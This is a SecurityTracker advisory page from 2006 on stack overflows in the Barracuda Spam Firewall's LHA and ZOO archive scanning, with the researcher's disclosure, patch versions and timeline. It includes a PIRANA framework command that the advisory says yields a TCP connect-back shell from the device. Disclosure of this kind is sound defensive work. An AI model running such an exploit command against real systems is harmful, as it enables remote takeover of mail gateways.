Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Device (Embedded Server/Appliance)  >   Barracuda Spam Firewall Vendors:   Barracuda Networks
Barracuda Spam Firewall Buffer Overflows in Processing LHA and ZOO Archives Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015866
SecurityTracker URL:
CVE Reference:   CVE-2004-0234, CVE-2006-0855   (Links to External Site)
Date:  Apr 4 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): with firmware < and with spamdef < 3.0.10045
Description:   Two vulnerabilities were reported in the Barracuda Spam Firewall. A remote user can execute arbitrary code on the target user's system.

A remote user can send e-mail with a specially crafted LHA archive containing a long filename to trigger a stack overflow and execute arbitrary code on the target device.

A remote user can also send an e-mail with a specially crafted ZOO archive to trigger a stack overflow and execute arbitrary code.

The vendor was notified on March 2, 2006.

Jean-Sebastien Guay-Leroux discovered this vulnerability. Ulf Harnhammar originally discovered the underlying LHA vulnerability.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   The vendor has issued a firmware fix ( and a patched spamdef (3.0.10045).
Vendor URL: (Links to External Site)
Cause:   Boundary error

Message History:   None.

 Source Message Contents

Subject:  Barracuda LHA archiver security bug leads to remote compromise

Topic:                  Barracuda LHA archiver security bug leads to
                        remote compromise

Announced:              2006-04-03
Product:                Barracuda Spam Firewall
Impact:                 Remote shell access
Affected product:       Barracuda with firmware < AND
                        spamdef < 3.0.10045
CVE ID:                 CVE-2004-0234


The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


When building a special LHA archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted LHA archive
attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.

For further informations about the details of the bugs, you can consult OSVDB
#5753 and #5754 .


Gain shell access to the remote Barracuda Spam Firewall


Using the PIRANA framework, available at , it is
possible to test the Barracuda Spam Firewall against the LHA vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address and port 1234:

perl -e 0 -h -a postmaster -s 0 -l \
-p 1234 -z -c 1 -d 1


Barracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,
available March 24th 2006.

They also published an official patch in firmware #, available April
3rd 2006.

It is recommended to update to firmware # .


Ulf Harnhammar who found the original LHA flaw.

and produced exploitation plugin for the PIRANA framework.



2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-24 : Problem fixed
2006-04-03 : Advisory disclosed to public


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC